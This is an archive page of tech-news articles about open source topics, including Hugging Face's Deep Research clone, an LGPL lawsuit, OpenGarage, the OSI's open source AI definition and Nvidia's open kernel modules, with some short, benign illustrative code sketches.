Open Source

Hugging Face clones OpenAI’s Deep Research in 24 hours

agentic AI, agents, AI, AI agents, Aymeric Roucher, chatgpt, chatgtp, code agents, Deep Research, DeepResearch, Google, Google Gemini, GPT-4o, Hugging Face, machine learning, Magnetic-One, microsoft, Open Source, open weights, Open weights AI, openai, smolagents / Rejus Almole / February 5, 2025

On Tuesday, Hugging Face researchers released an open source AI research agent called “Open Deep Research,” created by an in-house team as a challenge 24 hours after the launch of OpenAI’s Deep Research feature, which can autonomously browse the web and create research reports. The project seeks to match Deep Research’s performance while making the technology freely available to developers.

“While powerful LLMs are now freely available in open-source, OpenAI didn’t disclose much about the agentic framework underlying Deep Research,” writes Hugging Face on its announcement page. “So we decided to embark on a 24-hour mission to reproduce their results and open-source the needed framework along the way!”

Similar to both OpenAI’s Deep Research and Google’s implementation of its own “Deep Research” using Gemini (first introduced in December, before OpenAI’s), Hugging Face’s solution adds an “agent” framework to an existing AI model to allow it to perform multi-step tasks, such as collecting information and building a report as it goes, which it presents to the user at the end.
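To make the idea of an agent loop concrete, here is a minimal sketch in Python. It is not Hugging Face's or OpenAI's code: the `fake_model` function, the `TOOLS` table, and the tool names are hypothetical stand-ins for a real language model and real web tools. It only shows the general shape of the technique, in which a model repeatedly picks an action, a tool carries it out, and the notes accumulate into a report.

```python
from typing import Callable

# Hypothetical stand-in for a language model: it looks at the notes gathered
# so far and decides what to do next. A real agent would call an LLM here.
def fake_model(question: str, notes: list[str]) -> tuple[str, str]:
    if not notes:
        return ("search", question)
    if len(notes) == 1:
        return ("read", notes[0])
    return ("finish", "")

# Hypothetical tools; real ones would browse the web or open files.
TOOLS: dict[str, Callable[[str], str]] = {
    "search": lambda query: f"result for: {query}",
    "read": lambda source: f"summary of ({source})",
}

def run_agent(question: str, max_steps: int = 5) -> str:
    """Run the act-observe loop and return the notes as a numbered report."""
    notes: list[str] = []
    for _ in range(max_steps):
        action, argument = fake_model(question, notes)
        if action == "finish":
            break
        notes.append(TOOLS[action](argument))
    return "\n".join(f"{i}. {note}" for i, note in enumerate(notes, 1))

report = run_agent("Which ocean liner appeared in The Last Voyage?")
print(report)
```

The `max_steps` cap is a design choice worth keeping in any real loop, since a model that never chooses to finish would otherwise run forever.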

The open source clone is already racking up comparable benchmark results. After only a day’s work, Hugging Face’s Open Deep Research has reached 55.15 percent accuracy on the General AI Assistants (GAIA) benchmark, which tests an AI model’s ability to gather and synthesize information from multiple sources. OpenAI’s Deep Research scored 67.36 percent accuracy on the same benchmark.

As Hugging Face points out in its post, GAIA includes complex multi-step questions such as this one:

Which of the fruits shown in the 2008 painting “Embroidery from Uzbekistan” were served as part of the October 1949 breakfast menu for the ocean liner that was later used as a floating prop for the film “The Last Voyage”? Give the items as a comma-separated list, ordering them in clockwise order based on their arrangement in the painting starting from the 12 o’clock position. Use the plural form of each fruit.

To correctly answer that type of question, the AI agent must seek out multiple disparate sources and assemble them into a coherent answer. Many of the questions in GAIA represent no easy task, even for a human, so they test agentic AI’s mettle quite well.


German router maker is latest company to inadvertently clarify the LGPL license

avm, Cisco, free and open source, Free Software Foundation, FSF, GPL, LGPL, Linksys, Open Source, open source licenses, SFLC, Tech / Rejus Almole / January 10, 2025

The GNU General Public License (GPL) and its “Lesser” version (LGPL) are widely known and used. Still, every so often, a networking hardware maker has to get sued to make sure everyone knows how they work.

The latest such router company to face legal repercussions is AVM, the Berlin-based maker of the most popular home networking products in Germany. Sebastian Steck, a German software developer, bought an AVM Fritz!Box 4020 (PDF) and, being a certain type, requested the source code that had been used to generate certain versions of the firmware on it.

According to Steck’s complaint (translated to English and provided in PDF by the Software Freedom Conservancy, or SFC), he needed this code to recompile a networking library and add some logging to “determine which programs on the Fritz!Box establish connections to servers on the Internet and which data they send.” But Steck was also concerned about AVM’s adherence to GPL 2.0 and LGPL 2.1 licenses, under which its FRITZ!OS and various libraries were licensed. The SFC states that it provided a grant to Steck to pursue the matter.

AVM provided source code, but it was incomplete, as “the scripts for compilation and installation were missing,” according to Steck’s complaint. This included makefiles and details on environment variables, like “KERNEL_LAYOUT,” necessary for compilation. Steck notified AVM, AVM did not respond, and Steck sought legal assistance, ultimately including the SFC.

Months later, according to the SFC, AVM provided all the relevant source code and scripts, but the suit continued. AVM ultimately paid Steck’s attorney fee. The case proved, once again, that not only are source code requirements real, but the LGPL also demands freedom, despite its “Lesser” name, and that source code needs to be useful in making real changes to firmware—in German courts, at least.

“The favorable result of this lawsuit exemplifies the power of copyleft—granting users the freedom to modify, repair, and secure the software on their own devices,” the SFC said in a press release. “Companies like AVM receive these immense benefits themselves. This lawsuit reminded AVM that downstream users must receive those very same rights under copyleft.”

As noted by the SFC, the case was brought in July 2023, but as is typical with German law, no updates on the case could be provided until after its conclusion. SFC posted its complaint, documents, and the source code ultimately provided by AVM and encouraged the company to publish its own documents since those are not automatically public in Germany.


Startup set to brick $800 kids robot is trying to open source it first

Open Source, Robots, Smart Home, Tech / Tim Belzer / December 20, 2024

Earlier this month, startup Embodied announced that it is going out of business and taking its Moxie robot with it. The $800 robots, aimed at providing emotional support for kids ages 5 to 10, would soon be bricked, the company said, because they can’t perform their core features without the cloud. Following customer backlash, Embodied is trying to create a way for the robots to live an open sourced second life.

Embodied CEO Paolo Pirjanian shared a document via a LinkedIn blog post today saying that people who used to be part of Embodied’s technical team are developing a “potential” and open source way to keep Moxies running. The document reads:

This initiative involves developing a local server application (‘OpenMoxie’) that you can run on your own computer. Once available, this community-driven option will enable you (or technically inclined individuals) to maintain Moxie’s basic functionality, develop new features, and modify her capabilities to better suit your needs—without reliance on Embodied’s cloud servers.

The notice says that after releasing OpenMoxie, Embodied plans to release “all necessary code and documentation” for developers and users.

Pirjanian said that an over-the-air (OTA) update is now available for download that will allow previously purchased Moxies to support OpenMoxie. The executive noted that Embodied is still “seeking long-term answers” but claimed that the update is a “vital first step” to “keep the door open” for the robot’s continued functionality.

At this time, OpenMoxie isn’t available and doesn’t have a release date. Embodied’s wording also seems careful to leave open the possibility that OpenMoxie is never actually released, although the company seems optimistic.

However, there’s also a risk of users failing to update their robots properly and in time. Embodied noted that it won’t be able to support users who have trouble with the update or with OpenMoxie post-release. Updating the robot includes connecting to Wi-Fi and leaving it on for at least an hour.


Company claims 1,000 percent price hike drove it from VMware to open source rival

Biz & IT, Broadcom, Open Source, vmware / Kris Guyer / December 2, 2024

Companies have been discussing migrating off of VMware since Broadcom’s takeover a year ago led to higher costs and other controversial changes. Now we have an inside look at one of the larger customers that recently made the move.

According to a report from The Register today, Beeks Group, a cloud operator headquartered in the United Kingdom, has moved most of its 20,000-plus virtual machines (VMs) off VMware and to OpenNebula, an open source cloud and edge computing platform. Beeks Group sells virtual private servers and bare metal servers to financial service providers. It still has some VMware VMs, but “the majority” of its machines are currently on OpenNebula, The Register reported.

Beeks’ head of production management, Matthew Cretney, said that one of the reasons for Beeks’ migration was a VMware bill for “10 times the sum it previously paid for software licenses,” per The Register.

According to Beeks, OpenNebula has enabled the company to dedicate more of its fleet of 3,000 bare metal servers to client loads instead of to VM management, as it had to with VMware. With OpenNebula purportedly requiring less management overhead, Beeks is reporting a 200 percent increase in VM efficiency since it now has more VMs on each server.
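The figures quoted in this story mix multiples and percentages, so a quick arithmetic sketch may help. The baseline bill of 1.0 is an assumed placeholder, not a number from Beeks or The Register. Read strictly, a bill that is 10 times the old one is a 900 percent increase, and a 200 percent increase means three times the original figure.

```python
def percent_increase(old: float, new: float) -> float:
    """Percentage by which `new` exceeds `old`."""
    return (new - old) / old * 100.0

def multiple_from_increase(percent: float) -> float:
    """Convert a percent increase into a multiple of the original value."""
    return 1.0 + percent / 100.0

old_bill = 1.0              # assumed baseline, in arbitrary units
new_bill = 10.0 * old_bill  # "10 times the sum it previously paid"

hike = percent_increase(old_bill, new_bill)
vm_multiple = multiple_from_increase(200.0)  # "200 percent increase"

print(f"10x the old bill is a {hike:.0f} percent increase")
print(f"A 200 percent increase is {vm_multiple:.0f}x the original")
```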

Beeks also pointed to customers viewing VMware as non-essential and to a decline in VMware support services and innovation as drivers of its migration away from VMware.

Broadcom didn’t respond to Ars Technica’s request for comment.

Broadcom loses VMware customers

Broadcom will likely continue seeing some of VMware’s older customers decrease or abandon reliance on VMware offerings. But Broadcom has emphasized the financial success it has seen (PDF) from its VMware acquisition, suggesting that it will continue with its strategy even at the risk of losing some business.


I, too, installed an open source garage door opener, and I’m loving it

APIs, apple home, Cars, esp32, Features, garage door, Garage Door Opener, GENIE, home assistant, home automation, homekit, ifttt, mqtt, Open Source, opengarage, Smart Home, Tech / Tim Belzer / November 15, 2024

Open source closed garage

OpenGarage restored my home automations and gave me a whole bunch of new ideas.

Hark! The top portion of a garage door has entered my view, and I shall alert my owner to it. Credit: Kevin Purdy

Like Ars Senior Technology Editor Lee Hutchinson, I have a garage. The door on that garage is opened and closed by a device made by a company that, as with Lee’s, offers you a way to open and close it with a smartphone app. But that app doesn’t work with my preferred home automation system, Home Assistant, and also looks and works like an app made by a garage door company.

I had looked into the ratgdo Lee installed, and raved about, but hooking it up to my particular Genie/Aladdin system would have required installing limit switches. So I instead installed an OpenGarage unit ($50 plus shipping). My garage opener now works with Home Assistant (and thereby pretty much anything else), it’s not subject to the whims of API access, and I’ve got a few ideas how to make it even better. Allow me to walk you through what I did, why I did it, and what I might do next.

Thanks, I’ll take it from here, Genie

Genie, maker of my Wi-Fi-capable garage door opener (sold as an “Aladdin Connect” system), is not in the same boat as the Chamberlain/myQ setup that inspired Lee’s project. There was a working Aladdin Connect integration in Home Assistant, until the company changed its API in January 2024. Genie said it would release its own official Home Assistant integration in June, and it did, but then it was quickly pulled back, seemingly for licensing issues. Since then, no updates on the matter. (I have emailed Genie for comment and will update this post if I receive a reply.)

This is not egregious behavior, at least on the scale of garage door opener firms. And Aladdin’s app works with Google Home and Amazon Alexa, but not with Home Assistant or my secondary/lazy option, HomeKit/Apple Home. It also logs me out “for security” more often than I’d like and tells me this only after an iPhone shortcut refuses to fire. It has some decent features, but without deeper integrations, I can’t do things like have the brighter ceiling lights turn on when the door opens or flash indoor lights if the garage door stays open too long. At least not without Google or Amazon.

I’ve seen OpenGarage passed around the Home Assistant forums and subreddits over the years. It is, as the name implies, fully open source: hardware design, firmware, app code, API, everything. It is a tiny ESP board that has an ultrasonic distance sensor and circuit relay attached. You can control and monitor it from a web browser (mobile or desktop), from IFTTT, or over MQTT, and with the latest firmware, you can get email alerts. I decided to pull out the 6-foot ladder and give it a go.

Prototypes of the OpenGarage unit. To me, they look like little USB-powered owls, just with very stubby wings. Credit: OpenGarage

Installing the little watching owl

You generally mount the OpenGarage unit to the ceiling of your garage, so the distance sensor can detect if your garage door has rolled up in front of it. There are options for mounting with magnetic contact sensors or a side view of a roll-up door, or you can figure out some other way in which two different sensor depth distances would indicate an open or closed door. If you’ve got a Security+ 2.0 door (the kind with the yellow antenna, generally), you’ll need an adapter, too.

The toughest part of an overhead install is finding a spot that gives the unit a view of your garage door, not too close to rails or other obstructing objects, but then close enough for the contact wires and micro-USB cable to reach. Ideally, too, it has a view of your car when the door is closed and the car is inside, so it can report its presence. I’ve yet to find the right thing to do with the “car is inside or not” data, but the seed is planted.
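The ceiling-mount logic described above boils down to comparing one distance reading against two cutoffs. The sketch below assumes that setup. The threshold values and the names `Thresholds` and `classify` are illustrative assumptions, not OpenGarage's firmware or defaults, and real values depend on your ceiling height and car.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Thresholds:
    # Assumed example values in centimeters; tune them for your own garage.
    door_cm: int = 50      # at or below: the rolled-up door is right under the sensor
    vehicle_cm: int = 150  # at or below: a car roof is under the sensor

def classify(distance_cm: int, t: Thresholds = Thresholds()) -> tuple[str, str]:
    """Map one ceiling-mounted distance reading to (door state, car state)."""
    if distance_cm <= t.door_cm:
        # The open door blocks the view, so the car cannot be seen.
        return ("open", "unknown")
    if distance_cm <= t.vehicle_cm:
        return ("closed", "present")
    # Nothing but floor below the sensor.
    return ("closed", "absent")

for reading in (30, 120, 240):
    print(reading, classify(reading))
```

This is also why placement matters: if a rail or shelf sits inside the sensor's cone, it produces a short reading that looks like an open door.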

OpenGarage’s introduction and explanation video.

My garage setup, like most of them, is pretty simple. There’s a big red glowing button on the wall near the door, and there are two very thin wires running from it to the opener. On the opener, there are four ports that you can open up with a screwdriver press. Most of the wires are headed to the safety sensor at the door bottom, while two come in from the opener button. After stripping a bit of insulation to expose more wire, I pressed the contact wires from the OpenGarage into those same opener ports.

Wires running from terminal points in the back of a garage door opener, with one set of wires coming in from the bottom and pressed into the same press-fit holes. — The wire terminal on my Genie garage opener. The green and pink wires lead to the OpenGarage unit. Credit: Kevin Purdy

After that, I connected the wires to the OpenGarage unit’s screw terminals, then did some pencil work on the garage ceiling to figure out how far I could run the contact and micro-USB power cable, getting the proper door view while maintaining some right-angle sense of order up there. When I had reached a decent compromise between cable tension and placement, I screwed the sensor into an overhead stud and used a staple gun to secure the wires. It doesn’t look like a pro installed it, but it’s not half bad.

A garage ceiling, with drywall stud paint running across, a small device with wires running at right angles to the opener, and an opener rail beneath. — Where I ended up installing my OpenGarage unit. Key points: Above the garage door when open, view of the car below, not too close to rails, able to reach power and opener contact. Credit: Kevin Purdy

A very versatile board

If you’ve got everything placed and wired up correctly, opening the OpenGarage access point or IP address should give you an interface that shows you the status of your garage, your car (optional), and its Wi-Fi and external connections.

The landing screen for the OpenGarage. You can only open the door or change settings if you know the device key (which you should change immediately). Credit: Kevin Purdy

It’s a handy webpage and a basic opener (provided you know the secret device key you set), but OpenGarage is more powerful in how it uses that data. OpenGarage’s device can keep a cloud connection open to Blynk or the maker’s own OpenThings.io cloud server. You can hook it up to MQTT or an IFTTT channel. It can send you alerts when your garage has been open a certain amount of time or if it’s open after a certain time of day.
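The two alert conditions mentioned here, open for too long or open after a certain time of day, are simple to express as a rule. This is a sketch of that rule only, not OpenGarage's firmware. The function name, the 15-minute limit, and the 10 pm cutoff are assumptions chosen for illustration.

```python
from datetime import datetime, time, timedelta
from typing import Optional

def should_alert(
    opened_at: Optional[datetime],
    now: datetime,
    max_open: timedelta = timedelta(minutes=15),  # assumed limit
    cutoff: time = time(22, 0),                   # assumed "too late" hour
) -> bool:
    """Return True if the door has been open too long or is open late."""
    if opened_at is None:  # None means the door is currently closed
        return False
    open_too_long = now - opened_at >= max_open
    # Simplification: this only covers the hours from the cutoff to midnight.
    open_late = now.time() >= cutoff
    return open_too_long or open_late

opened = datetime(2024, 11, 15, 21, 0)
print(should_alert(opened, datetime(2024, 11, 15, 21, 5)))   # within limits
print(should_alert(opened, datetime(2024, 11, 15, 21, 20)))  # open too long
```

In practice you would feed this from whatever reports the door state, such as an MQTT message or a Home Assistant sensor, and send the notification wherever you like.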

Screenshot showing 5 sensors: garage, distance, restart, vehicle, and signal strength. — You’re telling me you can just… see the state of these things, at all times, on your own network? Credit: Kevin Purdy

You really don’t need a corporate garage coder

For me, the greatest benefit is in hooking OpenGarage up to Home Assistant. I’ve added an opener button to my standard dashboard (one that requires a long-press or two actions to open). I’ve restored the automation that turns on the overhead bulbs for five minutes when the garage door opens. And I can dig in if I want, like alerting me that it’s Monday night at 10 pm and I’ve yet to open the garage door, indicating I forgot to put the trash out. Or maybe some kind of NFC tag to allow for easy opening while on a bike, if that’s not a security nightmare (it might be).

Not for nothing, but OpenGarage is also a deeply likable bit of indie kit. It’s a two-person operation, with Ray Wang building on his work with the open and handy OpenSprinkler project, trading Arduino for ESP8266, and doing some 3D printing to fit the sensors and switches, and Samer Albahra providing mobile app, documentation, and other help. Their enthusiasm for DIY home control has likely brought out the same in others and certainly in me.

Kevin is a senior technology reporter at Ars Technica, covering open-source software, PC gaming, home automation, repairability, e-bikes, and tech history. He has previously worked at Lifehacker, Wirecutter, iFixit, and Carbon Switch.


“MNT Reform Next” combines open source hardware and usable performance

FOSS, mnt reform, Open Source, Tech / Kris Guyer / September 10, 2024

mnt reformed —

New design has sleeker profile, uses more RAM and better CPU than the original.

Andrew Cunningham – Sep 10, 2024 6:08 pm UTC

The current booting prototype of the MNT Reform Next. Credit: MNT Research

The casing prototype is still being prototyped with 3D prints, but the final version will be anodized aluminum. Credit: MNT Research

One of three “port boards” that handle internal and external connectivity. Credit: MNT Research

More streamlined (but still user-replaceable) battery packs are responsible for some of the Reform Next’s space savings. Credit: MNT Research

The original MNT Reform laptop was an interesting experiment, an earnest stab at the idea of a laptop that used entirely open source, moddable hardware as well as open source software. But as a modern Internet-connected laptop, its chunky design and (especially) its super-slow processor let it down.

MNT Research has been upgrading the Reform laptop and its smaller counterpart, the Pocket Reform, continuously since we took a look at it two-and-a-half years ago. The most significant upgrade is probably the Rockchip RK3588 processor upgrade, which offers four ARM Cortex-A76 CPU cores (the same ones used in the Raspberry Pi 5’s Broadcom SoC) and four ARM Cortex-A55 cores, plus either 16GB or 32GB of RAM. While still not a high-end speed demon, these specs are enough to make it a competent workhorse laptop for browsing and productivity apps.

Now, MNT is revisiting the Reform with a more significant design update. The MNT Reform Next is smaller and thinner, defaults to a more traditional glass trackpad instead of a trackball, and is starting with the Rockchip RK3588 instead of the poky NXP/Freescale processor that the original laptop was saddled with.

MNT says that the new Reform’s thinner profile is enabled by splitting the motherboard into multiple, smaller boards that are easier to replace and by designing “completely custom battery packs that tightly integrated electronics into the mechanical structure.” MNT details a motherboard with a CPU module connected to it and three different “port boards” to add internal and external connectivity.

The batteries themselves are still user-replaceable LiFePO4 batteries, though there are switches on the motherboard for people who want to use Li-ion batteries instead. “This optional user choice trades longer runtime for less safety and environmental friendliness,” according to MNT’s blog post.

The new Reform adds additional ports, including HDMI and USB-C, and it retains the mechanical keyboard that we liked from the original. It charges over USB-C. It also features four PCIe lanes internally for connecting M.2 storage.

Per usual, MNT is announcing this product many months or years before it will be available. The company says the Reform Next is in the “prototype stage,” and to get the first batches, you’ll need to support the project via the Crowd Supply crowdfunding site first. Pricing and more detailed availability information haven’t been announced, but if the idea of an entirely open laptop still appeals to you, the company says it will have more to share “later this week.”


Roblox announces AI tool for generating 3D game worlds from text

3D foundational model, 3D synthesis, AI, Biz & IT, game synthesis, gaming, generative ai, machine learning, multiplayer games, online games, Open Source, roblox, world generator, world synthesis / Rejus Almole / September 9, 2024

ease of use —

New AI feature aims to streamline game creation on popular online platform.

Benj Edwards – Sep 9, 2024 9:46 pm UTC

On Friday, Roblox announced plans to introduce an open source generative AI tool that will allow game creators to build 3D environments and objects using text prompts, reports MIT Tech Review. The feature, which is still under development, may streamline the process of creating game worlds on the popular online platform, potentially opening up more aspects of game creation to those without extensive 3D design skills.

Roblox has not announced a specific launch date for the new AI tool, which is based on what it calls a “3D foundational model.” The company shared a demo video of the tool where a user types, “create a race track,” then “make the scenery a desert,” and the AI model creates a corresponding model in the proper environment.

The system will also reportedly let users make modifications, such as changing the time of day or swapping out entire landscapes, and Roblox says the multimodal AI model will ultimately accept video and 3D prompts, not just text.

A video showing Roblox’s generative AI model in action.

The 3D environment generator is part of Roblox’s broader AI integration strategy. The company reportedly uses around 250 AI models across its platform, including one that monitors voice chat in real time to enforce content moderation, which is not always popular with players.

Next-token prediction in 3D

Roblox’s 3D foundational model approach involves a custom next-token prediction model—a foundation not unlike the large language models (LLMs) that power ChatGPT. Tokens are fragments of text data that LLMs use to process information. Roblox’s system “tokenizes” 3D blocks by treating each block as a numerical unit, which allows the AI model to predict the most likely next structural 3D element in a sequence. In aggregate, the technique can build entire objects or scenery.
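Roblox has not published its tokenization scheme, so the following is only a toy sketch of the general idea. It flattens a small grid of blocks into a sequence of integer tokens, then uses simple bigram counts as a stand-in for a learned next-token model. The block vocabulary, the grid, and the function names are all made up for illustration.

```python
from collections import Counter, defaultdict

# Hypothetical block vocabulary; the token IDs are arbitrary.
VOCAB = {"air": 0, "sand": 1, "road": 2}

def tokenize(grid):
    """Flatten a [z][y][x] grid of block names into one token sequence."""
    return [VOCAB[block] for layer in grid for row in layer for block in row]

def train_bigrams(tokens):
    """Count which token follows which; a toy substitute for a trained model."""
    counts = defaultdict(Counter)
    for prev, nxt in zip(tokens, tokens[1:]):
        counts[prev][nxt] += 1
    return counts

def predict_next(counts, prev):
    """Return the token most often seen after `prev` in the training data."""
    return counts[prev].most_common(1)[0][0]

# One layer, two rows: a strip of road with sand on both sides.
grid = [[["sand", "road", "road", "sand"],
         ["sand", "road", "road", "sand"]]]

tokens = tokenize(grid)
counts = train_bigrams(tokens)
print(tokens)
print(predict_next(counts, VOCAB["sand"]))
```

The flattening order matters: the model only ever sees a one-dimensional sequence, so the X, Y, and Z structure has to be recoverable from token position.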

Anupam Singh, vice president of AI and growth engineering at Roblox, told MIT Tech Review about the challenges in developing the technology. “Finding high-quality 3D information is difficult,” Singh said. “Even if you get all the data sets that you would think of, being able to predict the next cube requires it to have literally three dimensions, X, Y, and Z.”

According to Singh, lack of 3D training data can create glitches in the results, like a dog with too many legs. To get around this, Roblox is using a second AI model as a kind of visual moderator to catch the mistakes and reject them until the proper 3D element appears. Through iteration and trial and error, the first AI model can create the proper 3D structure.
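The generate-then-check arrangement Singh describes can be sketched as a simple rejection loop. Everything here is a stand-in: the "generator" just cycles through fixed leg counts and the "checker" is a one-line rule, whereas Roblox's real system uses two AI models whose details are not public.

```python
from itertools import cycle

def make_generator():
    """Stand-in generator: proposes dogs with 6, 5, then 4 legs, repeating."""
    leg_counts = cycle([6, 5, 4])
    def generate():
        return {"kind": "dog", "legs": next(leg_counts)}
    return generate

def looks_valid(candidate):
    """Stand-in for the second model that acts as a visual moderator."""
    return candidate["legs"] == 4

def generate_until_valid(generate, is_valid, max_tries=10):
    """Keep sampling until the checker accepts a candidate or tries run out."""
    for attempt in range(1, max_tries + 1):
        candidate = generate()
        if is_valid(candidate):
            return candidate, attempt
    raise RuntimeError("no valid candidate within max_tries")

dog, tries = generate_until_valid(make_generator(), looks_valid)
print(dog, "accepted after", tries, "tries")
```

The cost of this approach is wasted generations, so a retry limit like `max_tries` keeps a weak generator from looping indefinitely.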

Notably, Roblox plans to open-source its 3D foundation model, allowing developers and even competitors to use and modify it. But it’s not just about giving back—open source can be a two-way street. Choosing an open source approach could also allow the company to utilize knowledge from AI developers if they contribute to the project and improve it over time.

The ongoing quest to capture gaming revenue

News of the new 3D foundational model arrived at the 10th annual Roblox Developers Conference in San Jose, California, where the company also announced an ambitious goal to capture 10 percent of global gaming content revenue through the Roblox ecosystem, and the introduction of “Party,” a new feature designed to facilitate easier group play among friends.

In March 2023, we detailed Roblox’s early foray into AI-powered game development tools, as revealed at the Game Developers Conference. The tools included a Code Assist beta for generating simple Lua functions from text descriptions, and a Material Generator for creating 2D surfaces with associated texture maps.

At the time, Roblox Studio head Stef Corazza described these as initial steps toward “democratizing” game creation with plans for AI systems that are now coming to fruition. The 2023 tools focused on discrete tasks like code snippets and 2D textures, laying the groundwork for the more comprehensive 3D foundational model announced at this year’s Roblox Developers Conference.

The upcoming AI tool could potentially streamline content creation on the platform, possibly accelerating Roblox’s path toward its revenue goal. “We see a powerful future where Roblox experiences will have extensive generative AI capabilities to power real-time creation integrated with gameplay,” Roblox said in a statement. “We’ll provide these capabilities in a resource-efficient way, so we can make them available to everyone on the platform.”


Debate over “open source AI” term brings new push to formalize definition

AI, AI regulation, AI workshops, All Things Open, Biz & IT, chatgpt, chatgtp, flux, free software, GPT-4o, machine learning, Meta, Open Source, open source AI, Open Source Initiative, open weights, Open weights AI, openai, OSI, Raleigh, SB-1047, source available / Paul Patrick / August 27, 2024

A man peers over a glass partition, seeking transparency.

The Open Source Initiative (OSI) recently unveiled its latest draft definition for “open source AI,” aiming to clarify the ambiguous use of the term in the fast-moving field. The move comes as some companies like Meta release trained AI language model weights and code with usage restrictions while using the “open source” label. This has sparked intense debates among free-software advocates about what truly constitutes “open source” in the context of AI.

For instance, Meta’s Llama 3 model, while freely available, doesn’t meet the traditional open source criteria as defined by the OSI for software because it imposes license restrictions on usage due to company size or what type of content is produced with the model. The AI image generator Flux is another “open” model that is not truly open source. Because of this type of ambiguity, we’ve typically described AI models that include code or weights with restrictions or lack accompanying training data with alternative terms like “open-weights” or “source-available.”

To address the issue formally, the OSI, which is well-known for its advocacy for open software standards, has assembled a group of about 70 participants, including researchers, lawyers, policymakers, and activists. Representatives from major tech companies like Meta, Google, and Amazon also joined the effort. The group’s current draft definition of open source AI (version 0.0.9) emphasizes “four fundamental freedoms” reminiscent of those defining free software: giving users of the AI system the freedom to use it for any purpose without having to ask permission, study how it works, modify it for any purpose, and share it with or without modifications.

By establishing clear criteria for open source AI, the organization hopes to provide a benchmark against which AI systems can be evaluated. This will likely help developers, researchers, and users make more informed decisions about the AI tools they create, study, or use.

Truly open source AI may also shed light on potential software vulnerabilities of AI systems, since researchers will be able to see how the AI models work behind the scenes. Compare this approach with an opaque system such as OpenAI’s ChatGPT, which is more than just a GPT-4o large language model with a fancy interface—it’s a proprietary system of interlocking models and filters, and its precise architecture is a closely guarded secret.

OSI’s project timeline indicates that a stable version of the “open source AI” definition is expected to be announced in October at the All Things Open 2024 event in Raleigh, North Carolina.

“Permissionless innovation”

In a press release from May, the OSI emphasized the importance of defining what open source AI really means. “AI is different from regular software and forces all stakeholders to review how the Open Source principles apply to this space,” said Stefano Maffulli, executive director of the OSI. “OSI believes that everybody deserves to maintain agency and control of the technology. We also recognize that markets flourish when clear definitions promote transparency, collaboration and permissionless innovation.”

The organization’s most recent draft definition extends beyond just the AI model or its weights, encompassing the entire system and its components.

For an AI system to qualify as open source, it must provide access to what the OSI calls the “preferred form to make modifications.” This includes detailed information about the training data, the full source code used for training and running the system, and the model weights and parameters. All these elements must be available under OSI-approved licenses or terms.

Notably, the draft doesn’t mandate the release of raw training data. Instead, it requires “data information”—detailed metadata about the training data and methods. This includes information on data sources, selection criteria, preprocessing techniques, and other relevant details that would allow a skilled person to re-create a similar system.
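As a rough illustration, the draft's requirements as summarized in this article can be written as a checklist. This is a simplification for clarity, not the OSI's own wording or tooling. The `AIRelease` fields and the example release are hypothetical and do not describe any real model.

```python
from dataclasses import dataclass

@dataclass
class AIRelease:
    """Hypothetical description of what ships with an AI system."""
    data_information: bool        # metadata about training data and methods
    training_and_run_code: bool   # full source code for training and running
    weights_and_parameters: bool  # the model weights and parameters
    usage_restrictions: bool      # license limits on who may use it, or how

def missing_requirements(release: AIRelease) -> list[str]:
    """List which of the article's summarized criteria a release fails."""
    missing = []
    if not release.data_information:
        missing.append("data information")
    if not release.training_and_run_code:
        missing.append("training and inference code")
    if not release.weights_and_parameters:
        missing.append("weights and parameters")
    if release.usage_restrictions:
        missing.append("freedom to use for any purpose")
    return missing

# A made-up "open weights" release: weights only, with a restrictive license.
weights_only = AIRelease(False, False, True, True)
print(missing_requirements(weights_only))
```

Note that raw training data is not a field here, which reflects the draft's choice to require information about the data rather than the data itself.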

The “data information” approach aims to provide transparency and replicability without necessarily disclosing the actual dataset, ostensibly addressing potential privacy or copyright concerns while sticking to open source principles, though that particular point may be up for further debate.

“The most interesting thing about [the definition] is that they’re allowing training data to NOT be released,” said independent AI researcher Simon Willison in a brief Ars interview about the OSI’s proposal. “It’s an eminently pragmatic approach—if they didn’t allow that, there would be hardly any capable ‘open source’ models.”


The next Nvidia driver makes even more GPUs “open,” in a specific, quirky way

Biz & IT, CUDA, Linux, Linux kernel, NVIDIA, nvidia drivers, Open Source, Tech / Paul Patrick / July 18, 2024

You know open when you see it —

You can’t see inside the firmware, but more open code can translate it for you.

Kevin Purdy – Jul 18, 2024 5:34 pm UTC

GeForce RTX 4060 cards on display in a case — Getty Images

You have to read the headline on Nvidia’s latest GPU announcement slowly, parsing each clause as it arrives.

“Nvidia transitions fully” sounds like real commitment, a burn-the-boats call. “Towards open-source GPU,” yes, evoking the company’s “first step” announcement a little over two years ago, so this must be progress, right? But, back up a word here, then finish: “GPU kernel modules.”

So, Nvidia has “achieved equivalent or better application performance with our open-source GPU kernel modules,” and added some new capabilities to them. And now most of Nvidia’s modern GPUs will default to using open source GPU kernel modules, starting with driver release R560, with dual GPL and MIT licensing. But Nvidia has moved most of its proprietary functions into a proprietary, closed-source firmware blob. The parts of Nvidia’s GPUs that interact with the broader Linux system are open, but the user-space drivers and firmware are none of your or the OSS community’s business.

Is it better than what existed before? Certainly. AMD and Intel have maintained open source GPU drivers, in both the kernel and user space, for years, though also with proprietary firmware. This brings Nvidia a bit closer to the Linux community and allows for community debugging and contribution. There’s no indication that Nvidia aims to go further with its open source moves, however, and its modules remain outside the main kernel, packaged up for users to install themselves.

Not all GPUs will be able to use the open source drivers. A number of chips from the Maxwell, Pascal, and Volta lines are not compatible with them; GPUs from the Turing, Ampere, Ada Lovelace, and Hopper architectures are recommended to switch to the open bits; and Grace Hopper and Blackwell units must do so.
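The three tiers can be summarized as a small lookup table. This is only a sketch of the grouping described above: the tier labels and the helper name are invented for illustration and do not come from Nvidia's tooling.

```javascript
// Tiers follow the grouping in the article; the label strings are illustrative.
const OPEN_MODULE_TIERS = new Map([
  ["Maxwell", "incompatible"],
  ["Pascal", "incompatible"],
  ["Volta", "incompatible"],
  ["Turing", "recommended"],
  ["Ampere", "recommended"],
  ["Ada Lovelace", "recommended"],
  ["Hopper", "recommended"],
  ["Grace Hopper", "required"],
  ["Blackwell", "required"],
]);

// Hypothetical helper: returns the tier for an architecture name,
// or "unknown" for anything the article does not mention.
function openModuleTier(architecture) {
  return OPEN_MODULE_TIERS.get(architecture) ?? "unknown";
}

console.log(openModuleTier("Ampere")); // recommended
```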

As noted by Hector Martin, a developer on the Asahi Linux distribution, at the time of the first announcement, this shift makes it easier to sandbox closed-source code while using Nvidia hardware. But the net amount of closed-off code is about the same as before.

Nvidia’s blog post has details on how to integrate its open kernel modules onto various systems, including CUDA setups.


Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice

